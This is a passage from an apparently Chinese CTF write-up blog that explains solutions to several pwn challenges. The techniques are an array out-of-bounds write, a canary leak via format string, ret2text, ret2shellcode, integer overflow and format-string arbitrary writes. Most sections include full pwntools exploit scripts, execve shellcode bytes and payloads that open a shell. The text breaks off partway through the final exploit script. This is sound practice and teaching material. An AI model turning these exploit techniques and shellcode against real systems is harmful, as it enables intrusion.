\/><\/div><\/figure>\n\n\n\n<p>world_line_params\u662f\u4e0d\u662f\u548csecret_flag\u76f8\u9694\u5f97\u5f88\u8fd1\uff1f<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u8981\u5f15\u51fa\u4e00\u4e2a\u6f0f\u6d1e\u70b9\u4e86<\/p>\n\n\n\n<h4 
class=\"wp-block-heading\"><code>\u6570\u7ec4\u8d8a\u754c<\/code><\/h4>\n\n\n\n<p>\u5177\u4f53\u6f0f\u6d1e\u539f\u7406\u5efa\u8bae\u81ea\u884c\u641c\u7d22\u4e86\u89e3\uff0c\u6ca1\u770b\u61c2\u7684\u8054\u7cfb\u51fa\u9898\u4eba<\/p>\n\n\n\n<p>\u8fd9\u91cc\u76f4\u63a5\u8bb2\u89e3\u8fd9\u9898\u7684\u5e94\u7528<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u8ddf\u7740main\u51fd\u6570\u7684\u89c6\u89d2<\/p>\n\n\n\n<p>\u770b\u5230\u5b58\u5728\u4e00\u4e2amodify_param\u51fd\u6570<\/p>\n\n\n\n<p>\u8ddf\u8fdb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int __fastcall modify_param(unsigned int a1, unsigned int a2)<br>{<br>  world_line_params&#91;a1] = a2;<br>  return printf(&amp;byte_402043, a1, a2);<br>}<\/code><\/pre>\n\n\n\n<p>\u5173\u952e\u4fe1\u606f\u63d0\u53d6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53c2\u6570\u7c7b\u578b\uff1aa1\uff08\u7d22\u5f15\uff09\u548ca2\uff08\u65b0\u503c\uff09\u5747\u4e3aunsigned int\uff08\u65e0\u7b26\u53f7\u6574\u6570\uff09\uff0c\u800c\u975e\u4e4b\u524d\u9ed8\u8ba4\u7684signed int \u2192 \u5f71\u54cd\uff1a\u8f93\u5165\u7684 \u201c\u7d22\u5f15\u201d \u4f1a\u88ab\u5f53\u4f5c\u65e0\u7b26\u53f7\u6570\u5904\u7406 \u2014\u2014 \u82e5\u8f93\u5165\u8d1f\u6570\uff08\u5982-1\uff09\uff0c\u4f1a\u81ea\u52a8\u8f6c\u6362\u4e3a\u8d85\u5927\u65e0\u7b26\u53f7\u6570\uff08\u59820xFFFFFFFF\uff09\uff0c\u5bfc\u81f4\u8bbf\u95ee\u8fdc\u8d85\u9884\u671f\u7684\u5185\u5b58\u5730\u5740\uff0c\u65e0\u6cd5\u901a\u8fc7\u8d1f\u6570\u7d22\u5f15\u5411\u524d\u8d8a\u754c\uff0c\u53ea\u80fd\u901a\u8fc7\u6b63\u6570\u7d22\u5f15\u5411\u540e\u8d8a\u754c\uff08\u598211\uff09\u3002<\/li>\n\n\n\n<li><strong>\u6f0f\u6d1e\u70b9\u5b9e\u9524<\/strong>\uff1a\u51fd\u6570\u5185\u65e0\u4efb\u4f55\u7d22\u5f15\u6821\u9a8c\u903b\u8f91\uff08\u5982<code>a1 &lt; MAX_PARAMS<\/code>\uff09\uff0c\u76f4\u63a5\u6267\u884c<code>world_line_params[a1] = a2<\/code>\u2014\u2014 
\u65e0\u8bba<code>a1<\/code>\u591a\u5927\uff0c\u5747\u4f1a\u76f4\u63a5\u8bbf\u95ee\u6570\u7ec4\u5bf9\u5e94\u504f\u79fb\u7684\u5185\u5b58\uff0c\u6570\u7ec4\u8d8a\u754c\u6f0f\u6d1e\u5b8c\u5168\u786e\u8ba4<\/li>\n<\/ul>\n\n\n\n<p>\u7ed3\u5408<code>main<\/code>\u51fd\u6570\u4e0e<code>modify_param<\/code>\u7684\u8c03\u7528\u5173\u7cfb\uff0c\u6f0f\u6d1e\u5229\u7528\u8def\u5f84\u5c31\u51fa\u73b0\u4e86\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7528\u6237\u5728<code>main<\/code>\u51fd\u6570\u9009\u83dc\u5355 2\uff0c\u8f93\u5165 \u201c\u7d22\u5f15\u201d<code>v3<\/code>\uff08<code>unsigned int<\/code>\uff09\u548c \u201c\u65b0\u503c\u201d<code>v4<\/code>\uff08<code>unsigned int<\/code>\uff09\uff1b<\/li>\n\n\n\n<li><code>main<\/code>\u51fd\u6570\u76f4\u63a5\u8c03\u7528<code>modify_param(v3, v4)<\/code>\uff0c\u65e0\u4efb\u4f55\u53c2\u6570\u9884\u5904\u7406\uff1b<\/li>\n\n\n\n<li><code>modify_param<\/code>\u7528<code>v3<\/code>\u4f5c\u4e3a\u7d22\u5f15\uff0c\u76f4\u63a5\u4fee\u6539<code>world_line_params[v3]<\/code>\u2014\u2014 \u82e5<code>v3=11<\/code>\uff0c\u5219\u7cbe\u51c6\u4fee\u6539<code>secret_flag<\/code>\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u597d\uff0c\u51fa\u73b0\u4e86\u4e00\u4e2a\u95ee\u9898\uff0c\u4e3a\u4ec0\u4e48\u662f11\uff1f<\/p>\n\n\n\n<p>\u5728\u4e0a\u9762\u7684\u56fe\u4e0a\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230world_line_params \u79bb secret_flag \u7684\u8ddd\u79bb\u5f88\u8fd1\uff0c\u5b83\u4eec\u5730\u5740\u7684\u5dee\u503c\u4e3a 0x408C-0x4060=0x2c =44\u5b57\u8282\u3002 \u7531\u4e8e\u6574\u578b\u6570\u7ec4\u6bcf\u4e2a\u5143\u7d20\u53604\u5b57\u8282,\u6545\u9700\u8981\u5c06\u6570\u7ec4\u7d22\u5f15\u8c03\u81f344\/4 = 11\u4fbf\u53ef\u8d8a\u754c\u5230 secret_flag \u5199\u5165\u5185\u5bb9\u3002<\/p>\n\n\n\n<p>\u53ea\u8981\u5728secret_flag\u91cc\u5199\u4e0a0x7FFFFFFF<\/p>\n\n\n\n<p>\u6211\u4eec\u5c31\u80fd\u62ff\u5230shell<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br><br># p = 
process('.\/steins_gate')<br><br>p = remote('ctf.ctbu.edu.cn', 33962)<br><br># \u8ba1\u7b97secret_flag\u76f8\u5bf9\u4e8e\u6570\u7ec4\u7684\u504f\u79fb\u91cf<br>offset = 11<br><br># \u76ee\u6807\u503c\uff1a0x7FFFFFFF<br>target_value = 0x7FFFFFFF<br><br># \u53d1\u9001\u4fee\u6539\u53c2\u6570\u7684\u8bf7\u6c42\uff08\u4f7f\u7528\u5b57\u8282\u7c7b\u578b\uff09<br>p.sendlineafter(b\"&gt; \", b\"2\")  # \u9009\u62e9\u4fee\u6539\u53c2\u6570\u529f\u80fd<br>p.sendlineafter(b\": \", str(offset).encode())  # \u8f93\u5165\u504f\u79fb\u91cf\u4f5c\u4e3a\u7d22\u5f15<br>p.sendlineafter(b\": \", str(target_value).encode())  # \u8bbe\u7f6e\u76ee\u6807\u503c<br><br># \u4ea4\u4e92\u83b7\u53d6shell<br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u91d1\u4e1d\u96c0\u4e0e\u4f60\u7684\u7b80\u5386<\/h3>\n\n\n\n<p>\u8fd9\u9898\u53eb\u91d1\u4e1d\u96c0\uff0c\u524d\u9762\u67e5\u4fdd\u62a4\u7684\u65f6\u5019<\/p>\n\n\n\n<p>\u6709\u7ec6\u5fc3\u7684\u540c\u5b66\u80af\u5b9a\u53d1\u73b0\u4e86\u4e00\u4e2a\u53ebcanary\u7684\u4fdd\u62a4\u673a\u5236<\/p>\n\n\n\n<p>\u800ccanary\u5c31\u662f\u91d1\u4e1d\u96c0\u7684\u82f1\u6587<\/p>\n\n\n\n<p>Canary\uff08\u91d1\u4e1d\u96c0\uff09\u4fdd\u62a4\u673a\u5236\u662f\u4e00\u79cd<strong>\u9632\u5fa1\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\u7684\u5b89\u5168\u6280\u672f\uff0c\u5176\u6838\u5fc3\u601d\u60f3\u662f\u5728\u6808\u4e2d\u6613\u88ab\u7be1\u6539\u7684\u5173\u952e\u6570\u636e\uff08\u5982\u51fd\u6570\u8fd4\u56de\u5730\u5740\uff09\u524d\uff0c\u63d2\u5165\u4e00\u4e2a\u7279\u6b8a\u7684 \u201c\u54e8\u5175\u503c\u201d\uff08\u5373 Canary 
\u503c\uff09\uff0c\u901a\u8fc7\u68c0\u6d4b\u8be5\u503c\u662f\u5426\u88ab\u7be1\u6539\uff0c\u6765\u5224\u65ad\u662f\u5426\u53d1\u751f\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u4ece\u800c\u963b\u6b62\u6076\u610f\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n<p>\u8981\u60f3\u5728canary\u4fdd\u62a4\u673a\u5236\u4e0b\u5b8c\u6210\u6808\u6ea2\u51fa\uff0c\u65b9\u6cd5\u8fd8\u662f\u5f88\u591a\u6837\u7684<\/p>\n\n\n\n<p>\u8fd9\u91cc\u53ea\u8bb2\u6700\u7b80\u5355\u7684\u505a\u6cd5<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u4f9d\u9760\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u6cc4\u9732canary\uff0c\u7136\u540e\u5148\u586b\u5145\u5783\u573e\u5b57\u8282\u540e\uff0c\u518d\u53d1\u9001\u539fcanary\u503c\uff0c\u518d\u5b8c\u6210\u6ea2\u51fa\uff0c\u8fd4\u56de\u5230\u4f60\u60f3\u8981\u7684\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u90a3\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u600e\u4e48\u5f04\uff1f<\/p>\n\n\n\n<p>\u61d2\u5f97\u8bb2\u8fd9\u4e2a\u5c0f\u77e5\u8bc6\u70b9\u4e86<\/p>\n\n\n\n<p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/465896542\">CTFer\u6210\u957f\u65e5\u8bb011\uff1a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u7684\u539f\u7406\u4e0e\u5229\u7528 &#8211; \u77e5\u4e4e<\/a><\/p>\n\n\n\n<p>\u94fe\u63a5\u8bb2\u5f97\u5f88\u6e05\u695a\u4e86<\/p>\n\n\n\n<p>\u73b0\u5728\u6211\u4eec\u5148\u6765\u627ecanary\u5728\u6808\u4e0a\u7684\u4f4d\u7f6e<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u7a33\u59a5\u7684\u627e\u6cd5\u80af\u5b9a\u662fgdb\u52a8\u8c03<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gdb .\/attachment<br>pwndbg&gt;b *0x4013BB                     #break \u4e0b\u65ad\u70b9\uff0c\u8fd9\u91cc\u76840x4013BB\u662fcall _printf\u7684\u5730\u5740\uff0c\u8fd9\u91cc\u8fd9\u6837\u8c03\u66f4\u5feb\u800c\u5df2<br>pwndbg&gt;r                               #run   \u8fd0\u884c<br><br>pwndbg&gt; canary<br>AT_RANDOM = 0x7fffffffe099 # points to (not masked) global canary value<br>Canary    = 0x8853ad50cb138900 (may be incorrect on != glibc)<br>Thread 1: Found valid 
canaries.<br>00:0000\u2502-358 0x7fffffffd888 \u25c2\u2014 0x8853ad50cb138900<br>Additional results hidden. Use --all to see them.<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u8fd9\u4e00\u6b21\u8fd0\u884c\u7684canary = 0x8853ad50cb138900 \uff08canary\u672c\u8d28\u4e0a\u662f\u4ecefs\u5bc4\u5b58\u5668\u91cc\u53d6\u51fa\u6765\u7684\u968f\u673a\u503c\uff0c\u6240\u4ee5\u6bcf\u6b21\u7684\u503c\u4e0d\u4e00\u6837\uff09<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65f6\u5019\uff0c\u518d\u7ed3\u5408\u529f\u80fd\u9009\u98791\u91cc\u5b58\u5728\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8fdb\u884c\u6808\u4e0a\u4f4d\u7f6e\u7684\u6cc4\u9732<\/p>\n\n\n\n<p>\u5148ni\uff0c\u6b65\u8fdb\u5230\u8f93\u5165username\u5904<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pwndbg&gt; <br>Please input your username: AAAAAAAA%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p<br>Hello, AAAAAAAA0x7fffffffd9c0-(nil)-(nil)-(nil)-(nil)-0x4141414141414141-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x7fffff0a7025-0x7fffffffdcf8-0x8853ad50cb138900-0x7fffffffdbe0-0x401403<br>\ufffd\ufffd<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u6211\u4eec\u7eaf\u9760\u6570\u90fd\u884c\uff0c\u521a\u521a\u597d\uff0c\u7b2c15\u4f4d\u5c31\u662f\u6211\u4eeccanary\u7684\u503c<\/p>\n\n\n\n<p>\u6240\u4ee5canary\u4f4d\u7f6e\u5c31\u51fa\u6765\u4e86\uff0c\u4e4b\u540e\u6211\u4eec\u5728exp\u91cc\uff0c\u7528%15$p\u7684\u5f62\u5f0f\u83b7\u53d6canary\u503c\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>canary\u5230\u624b\u4e86\uff0c\u5269\u4e0b\u7684\u5c31\u662f\u62ff\u529f\u80fd\u9009\u98792\u91cc\u5b58\u5728\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e\u6253ret2text\u4e86<\/p>\n\n\n\n<p>\u6709backdoor\u51fd\u6570\uff0c\u51fd\u6570\u6548\u679c\u662fcat flag<\/p>\n\n\n\n<p>\u601d\u8def\u5c31\u8fd9\u6837\u4e86<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(log_level = \"debug\")<br><br># p = remote(\"ctf.ctbu.edu.cn\", 
33659)<br><br>p = process(\".\/attachment\")<br><br>backdoor = 0x4011C6<br><br>p.sendlineafter(\"choose a function (1-3): \", \"1\")<br><br><br>payload1 = b'aaaaaaaa%15$p'<br>p.sendline(payload1)<br>print(p.recvuntil(b'aaaaaaaa'))<br>canary = int(p.recvuntil(b'00').decode(),16)<br>print(hex(canary))<br><br>p.sendlineafter(\"choose a function (1-3): \", \"2\")<br><br>ret = 0x0000000000401016<br><br><br>p.sendafter(b\"Please input your bio: \",b'a' * (0x88) + p64(canary) + b'a' * 8 + p64(ret) + p64(backdoor))<br><br><br>p.interactive()<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u8fd8\u5b58\u5728\u4e00\u4e2a\u6808\u5e73\u8861\u95ee\u9898\uff0c\u5982\u679c\u4e0d\u5904\u7406\u8fd9\u4e2a\u6808\u5e73\u8861\u95ee\u9898\uff0c\u5c31\u4f1a\u51fa\u73b0\u8fdb\u4e86backdoor\u51fd\u6570\u4f46\u662f\u6ca1flag\u663e\u793a\u7684\u95ee\u9898<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u4e5f\u5f88\u597d\u5904\u7406\uff0c\u901a\u8fc7\u591a\u52a0\u4e00\u4e2aret\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>ret\u7684\u627e\u6cd5\u7684\u8bdd\uff0cROPgadget\u662f\u4e2a\u597d\u4e1c\u897f<\/p>\n\n\n\n<p>\u5982\u8fd8\u6709\u7591\u95ee\uff0c\u8bf7\u8054\u7cfb\u51fa\u9898\u4eba<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">CDU\u7384\u6b66\u676f<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">are you lucky<\/h1>\n\n\n\n<p>\u4ea4\u4e92\uff0c\u53d1\u73b0\u8981\u767b\u5f55\uff0c\u8ddf\u968flogin\u51fd\u6570<\/p>\n\n\n\n<p>\u770b\u5230\u662fencode(114514)<\/p>\n\n\n\n<p>\u8ddf\u8fdbencode\u770b\u52a0\u5bc6\u539f\u7406<\/p>\n\n\n\n<p>\u5927\u81f4\u80fd\u770b\u51fa\u662f\u4e2abase64<\/p>\n\n\n\n<p>\u76f4\u63a5\u6254ai\u52a0\u5bc6\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-59-168x1024.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"168\" height=\"1024\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-59-168x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-713\"  sizes=\"auto, (max-width: 168px) 100vw, 168px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5c31\u6b63\u5e38\u8fdb\u83dc\u5355\u754c\u9762\u4e86<\/p>\n\n\n\n<p>\u89c2\u5bdf\u5404\u51fd\u6570<\/p>\n\n\n\n<p>\u7531\u4e8e\u9898\u76ee\u5f00\u4e86pie\uff0c\u6240\u4ee5\u8981\u627e\u5230\u8fd0\u884c\u65f6\u7684\u5b9e\u9645\u5730\u5740<\/p>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u6ce8\u610f\u5230edit\u51fd\u6570\u4e2d\u5b58\u5728\u4e00\u4e2a\u683c\u4e32<\/p>\n\n\n\n<p>\u901a\u8fc7\u591a\u6b21\u8fdc\u7a0b\u8c03\u8bd5\u53ef\u4ee5\u62ff\u5230\u6808\u4e0a\u53c2\u6570\u7684\u5730\u5740\uff0c\u7136\u540e\u5012\u56de\u53bb\u627e\u5230main\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u4ee5\u53ca\u5728root\u51fd\u6570\u91cc\u53ef\u4ee5\u770b\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-58-1024x546.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-58-1024x546.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-712\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u9700\u8981\u6539\u6389target\u7684\u503c\u624d\u80fd\u5b8c\u6210\u5199\u5165\/bin\/sh\u7684\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u91cc\u8fd8\u53ef\u4ee5\u6839\u636e\u6cc4\u9732\u7684\u5730\u5740\u627e\u5230target\u7684\u5b9e\u9645\u8fd0\u884c\u5730\u5740\uff0c\u5e76\u5229\u7528\u683c\u4e32\u7684\u4efb\u610f\u5199\u76f4\u63a5\u6539\u6389target\u7684\u503c<\/p>\n\n\n\n<p>\u6700\u540e\u5728\u4f20\u5165\/bin\/sh\u540e\u518d\u4f20\u5165\u4e00\u4e2a\u77ed\u7684shellcode\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(os='linux',arch='amd64',log_level='debug')<br>\u200b<br>p= remote('node10.anna.nssctf.cn',22717)<br>#p = process(\".\/pwn\")<br>username=\"user_name\"<br>password= \"MTE0NTE0\"<br>p.recvuntil(b'username')<br>p.sendline(username)<br>p.recvuntil(b'password')<br>p.sendline(password)<br>\u200b<br>\u200b<br>p.recvuntil(b'choice &gt;&gt;')<br>p.sendline(b'1')<br>p.recvuntil(b'name')<br>\u200b<br>p.sendline(b'%18$p')<br>p.recvuntil(b\"name is\\n\")<br>leaked_addr = int(p.recvline().strip(), 16)<br>log.info(f\"leak:{hex(leaked_addr)}\")<br>main_addr= leaked_addr-0x40a0<br>log.info(f\"main:{hex(main_addr)}\")<br>p.recvuntil(b'new password')<br>p.sendline(b'123')<br>\u200b<br>\u200b<br>target_addr=main_addr+0x40CC<br>log.info(f\"target_addr: {hex(target_addr)}\")<br>payload = fmtstr_payload(20,{target_addr:0x2918})<br>\u200b<br>p.recvuntil(b'choice &gt;&gt;')<br>p.sendline(b'1')<br>p.recvuntil(b'new name')<br>p.sendline(payload)<br>p.recvuntil(b'new password')<br>p.sendline(b'123')<br>\u200b<br>p.recvuntil(b'choice 
&gt;&gt;')<br>p.sendline(b'3')<br>p.recvuntil(b'access')<br>\u200b<br>p.send(b\"\/bin\/sh\\0\") &nbsp;<br>\u200b<br>p.recvuntil(b\"start your performance\")<br>\u200b<br>shellcode = asm('''<br> &nbsp;  lea rdi, &#91;rsp+0x18] &nbsp; &nbsp;<br> &nbsp;  xor esi, esi &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp;  push 0x3b<br> &nbsp;  pop rax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;  cdq &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;  syscall<br>''')&#91;:15]<br>\u200b<br>p.send(shellcode)<br>p.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ret2shellcode<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-57.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"651\" height=\"359\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-57.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-711\"  sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f1a\u8f93\u51fabuf\u7684\u5b9e\u9645\u5730\u5740\uff0c\u8fd4\u56de\u7684\u662fgets\u51fd\u6570\uff0c\u6808\u6ea2\u51fa\u4e86\uff0c\u63d0\u793a\u662fshellcode\uff0c\u76f4\u63a5\u4f20\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u586b\u5145\u81f3\u6ea2\u51fa\uff0c\u627eret\uff0c\u6839\u636e\u5199\u5165\u7684\u5b57\u8282\u957f\u5ea6\u63a7\u5236\u7a0b\u5e8f\u6d41\u5230shellcode\u7684\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import 
*<br>\u200b<br>io = remote(\"node9.anna.nssctf.cn\", 26033)<br># io = process(\".\/pwn\")<br>offset = 72 &nbsp;<br>context.arch = 'amd64' &nbsp;<br>context.os = 'linux'<br>#shellcode = asm(shellcraft.sh()) &nbsp;<br>shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'<br>\u200b<br>io.recvuntil(b'buf @ ') &nbsp;<br>buf_addr = io.recvline().strip() &nbsp;<br>buf = int(buf_addr, 16) &nbsp;<br>print(hex(buf))<br>\u200b<br>\u200b<br>ret = 0x000000000040101a &nbsp;<br>payload = b'a' * offset + p64(ret) + p64(buf + 72 + 8 + 8) + shellcode<br>\u200b<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Integer_Overflow<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-56.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"457\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-56.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-710\"  sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/div><\/figure>\n\n\n\n<p>v4\u662fint\u7c7b\u578b\u7684\u6570\u636e\uff0c\u53ef\u4ee5\u9020\u6210\u6574\u6570\u6ea2\u51fa\uff0c\u5f88\u5e38\u89c4<\/p>\n\n\n\n<p>\u76f4\u63a5\u8f93\u51654294967295<\/p>\n\n\n\n<p>\u5c31\u8fdbshell\u4e86\uff0c\u4ea4\u4e92\u62ffflag\u5373\u53ef<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">fmt<\/h1>\n\n\n\n<figure 
class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-55.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"449\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-55.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-709\"  sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/div><\/figure>\n\n\n\n<p>\u6539\u503c\u5c31\u80fdgetshell<\/p>\n\n\n\n<p>\u80fd\u627e\u5230target\u7684\u6808\u4e0a\u5730\u5740<\/p>\n\n\n\n<p>\u968f\u624b\u624d\u6539\u4e86\u4e24\u6b21\uff0c\u53d1\u73b0\u8f93\u5165\u7b2c8\u4f4d\u5c31\u662ftarget\u7684\u4f4d\u7f6e\uff0c\u90a3\u4e48\u5c31\u76f4\u63a5\u6839\u636e\u683c\u4e32\u7684\u4efb\u610f\u5199\u6548\u679c\u8fdb\u884c\u8986\u5199<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br># p = remote('node9.anna.nssctf.cn', 21634)<br>p = process(\".\/pwn1\")<br>\u200b<br>p.recvuntil(b'message: ')<br>\u200b<br>target_addr = 0x40408c<br>payload = b'A' * 6<br>payload += b'%8$n'<br>payload += b'B' * 6<br>payload += 